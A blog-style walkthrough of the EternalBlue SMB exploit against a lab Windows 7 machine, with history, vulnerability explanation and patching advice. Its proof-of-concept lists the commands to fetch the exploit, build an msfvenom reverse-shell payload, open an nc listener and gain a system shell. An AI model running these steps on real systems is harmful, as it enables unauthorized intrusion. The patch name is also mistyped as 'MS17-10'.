Disclaimer: This post is for research and educational purposes only. I do not take any responsibility, in regards to the actions taken by readers of this article. Never attempt to hack a device for which you do not have the required permissions to do so.

A bit of history:

The EternalBlue exploit was developed by the NSA, which exploits a software vulnerability in Microsoft’s SMB protocol on Windows operating systems. It was leaked by a hacker group know as “Shadow Brokers” on April 14, 2017, one month after Microsoft released patches for the vulnerability. The NSA did not alert Microsoft about the vulnerabilities, and held on to it for more than five years, until they were forced to do so due to the breach. NSA then warned Microsoft after learning about EternalBlue’s possible theft, Hence, the birth of  CVE-2017-0144.

Advertisements

What does the exploit do?

EternalBlue is an exploit that allows cyber threat actors to remotely execute arbitrary code and gain access to a network by sending specially crafted packets. This exploit allows cyber threat actors to compromise the entire network and all devices connected to it. Due to EternalBlue’s ability to compromise networks, if one device is infected by malware
via EternalBlue, every device connected to the network is at risk. This makes recovery difficult, as all devices on a network may have to be taken offline for remediation.

Eternalblue takes advantage of mathematical error when the protocol tries to cast an OS/2 FileExtended Attribute (FEA) list structure to an NT FEA structure in order to determine how much memory to allocate. A miscalculation creates an integer overflow that causes less memory to be allocated than expected, which in turns leads to a buffer overflow. With more data than expected being written, the extra data can overflow into adjacent memory space.

Proof Of Concept

Target Machine: Windows 7 (10.10.10.40)
Attack Machine: Kali Linux (10.10.14.6)

First we clone the exploit to our directory

searchsploit -m 42315

After looking at the source code, we need to do three things:

  1. Download mysmb.py since the exploit imports it. The download location is included in the exploit.
  2. Use MSFvenom to create a reverse shell payload.
  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload.

Step 1

wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py
mv 42315.py.1 mysmb.py

Step 2

msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.6 LPORT=4444 > eternal-blue.exe

Step 3

Change authentication, in this case guest is allowed.

Modify reverse shell location

Now that we’re done all three tasks, setup a listener on your attack machine.

nc -nlvp 4444

Then run the exploit.

python 42315.py 10.10.10.40

We have a shell with system privileges!

Remediation

By far the most important thing to do to prevent attacks utilizing Eternalblue is to make sure that you’ve updated any older versions of Windows to apply the security patch MS17-10.If that’s not possible, other mitigations include disabling SMBv1 and not exposing any vulnerable machines to internet access.

Advertisements